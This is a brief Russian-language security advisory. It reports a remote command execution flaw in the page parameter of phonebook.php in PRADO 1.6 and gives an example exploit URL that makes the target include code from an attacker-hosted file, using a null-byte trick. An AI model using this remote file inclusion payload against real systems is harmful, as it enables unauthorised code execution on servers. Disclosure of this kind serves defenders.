Программа: PRADO 1.6
Уязвимость в PRADO позволяет удаленному пользователю выполнить произвольные команды на целевой системе.
Уязвимость обнаружена в параметре page в сценарии phonebook.php.
Пример:
http://[target]/examples/phonebook.php?page= http://[attacker]/evilcode.txt%00&filter=P
